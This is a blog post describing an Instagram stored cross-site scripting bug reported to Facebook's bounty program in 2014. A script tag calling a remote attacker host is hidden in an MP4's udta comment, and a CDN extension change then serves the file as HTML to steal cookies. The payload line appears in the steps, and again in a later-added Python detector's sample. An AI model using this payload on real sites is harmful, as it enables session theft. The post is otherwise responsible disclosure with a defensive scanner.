Sunday, October 12, 2014

Facebook BugBounty - Instagram bug

On 26.07.2014 I had been working for around a month on an extension for Mozilla Firefox to bring the Instagram mobile app to the web browser. After researching the video uploading process, I found a bug in the server-side scripts through which I could upload videos longer than 15 seconds to my Instagram account. I created a PHP script to upload videos longer than 15 seconds and uploaded 3 videos with lengths of 2:09', 1:17' and 1:13'. After that I reported it to Facebook. In return they asked me for the proof of concept code and I sent the code to them. They replied to my report as follows:

Thank you for your thoughtful submission. While this is indeed a bug, at this time we feel it is not a security bug so unfortunately it is not eligible for the bounty program. We encourage you to continue to search for more bugs.

I was sure that there was a security bug there, so I tried to prove an XSS bug to them.
Here I describe how I could hack an Instagram account and steal cookies just by opening a video link.
Please note that because they did not accept the bug that I reported about uploading too large or too small videos to Instagram, I will not describe any details about how it is vulnerable and how it is possible to bypass their restrictions on video lengths.
The steps were as follows:
1) Creating an mp4 video file with a length of 208 milliseconds.
2) Injecting the video with malicious code. This is possible through the mp4 udta atom. To inject the video in Windows OS, just right-click on the mp4 video and, in the Details tab, add this line of JavaScript code in the Comments box:
<html><script src="http://your_remote_server_url/js.js"></script></html>
Then select OK; the video file is ready.
3) Uploading the malicious video...
4) After a successful upload the created link was: http://videos-g-0.ak.instagram.com/hphotos-ak-xaf1/10591347_749153508480280_798124904_n.mp4
Before this step I was aware of another bug in their CDNs through which changing the extension of uploaded files was possible, so the final link was:
http://videos-g-0.ak.instagram.com/hphotos-ak-xaf1/10591347_749153508480280_798124904_n.html

The video shows the effect:
https://www.youtube.com/watch?v=F9mPIW3x6ak



After I sent my second report, the security team at Facebook approved the bug and promised me $1500.
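
A defensive check for the condition described in the steps above, added here as an example and not part of the original post or Facebook's fix: it walks the MP4 box structure and reports HTML-like markup stored in any udta payload. The tag list, the `\xa9cmt` child box and the sample files are assumptions constructed for illustration.

```python
import re
import struct

CONTAINERS = {b"moov", b"trak"}          # boxes whose payload is a list of boxes
MARKUP = re.compile(rb"<\s*(script|html|iframe|svg|img|body)\b", re.I)

def iter_boxes(buf, start=0, end=None, path=()):
    """Yield (path, payload_start, payload_end) for every box, depth-first."""
    end = len(buf) if end is None else end
    pos = start
    while pos + 8 <= end:
        size, kind = struct.unpack_from(">I4s", buf, pos)
        header = 8
        if size == 1:                    # 64-bit size stored after the type
            if pos + 16 > end:
                raise ValueError(f"truncated box header at offset {pos}")
            size, header = struct.unpack_from(">Q", buf, pos + 8)[0], 16
        elif size == 0:                  # box extends to the end of its parent
            size = end - pos
        if size < header or pos + size > end:
            raise ValueError(f"bad box size at offset {pos}")
        here = path + (kind,)
        yield here, pos + header, pos + size
        if kind in CONTAINERS:
            yield from iter_boxes(buf, pos + header, pos + size, here)
        pos += size

def udta_markup(buf):
    """Return [(box_path, tag)] for markup-like strings inside udta payloads."""
    hits = []
    for path, lo, hi in iter_boxes(buf):
        if path[-1] != b"udta":
            continue
        # Dropping NUL bytes lets the same pattern catch UTF-16 text (heuristic).
        data = buf[lo:hi].replace(b"\x00", b"")
        where = "/".join(k.decode("latin-1") for k in path)
        hits += [(where, m.group(1).lower().decode()) for m in MARKUP.finditer(data)]
    return hits

def box(kind, payload=b""):
    """Build one box; used only to construct the sample files below."""
    return struct.pack(">I4s", 8 + len(payload), kind) + payload

# Constructed samples, not real uploads: a clean file and one with markup in udta.
COMMENT = b'<html><script src="http://example.invalid/js.js"></script></html>'
HEAD = box(b"ftyp", b"isom\x00\x00\x02\x00isom") + box(b"free")
CLEAN = HEAD + box(b"moov", box(b"mvhd", bytes(100)))
TAINTED = HEAD + box(b"moov", box(b"mvhd", bytes(100)) + box(b"udta", box(b"\xa9cmt", COMMENT)))
```

An upload pipeline would reject or strip a file for which `udta_markup` returns anything, and treat the `ValueError` raised on a malformed box size as a rejection too. The scan covers only the metadata half of the issue; the other half in the post is the CDN returning the same bytes under a `.html` name, which is addressed by serving stored media with a fixed video content type regardless of the requested extension.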


Timeline

Jul 26, 2014 7:08am – Initial report sent
Jul 28, 2014 2:21pm – Request for proof of concept code
Jul 28, 2014 2:49pm – Proof of concept code sent
Jul 29, 2014 12:57pm – Case closed
Aug 3, 2014 10:42am – Second report sent
Aug 5, 2014 7:50am – Acknowledgment of issue by Facebook
Aug 11, 2014 11:33am – Notification of permanent fix by Facebook
Aug 11, 2014 4:55pm – Confirmation of permanent fix sent
Aug 12, 2014 10:22pm – Bounty awarded

2 comments:

  1. how to send the report to the fb network

  2. How To Report Bug On Instagram? I Not Found This Link/Url Report
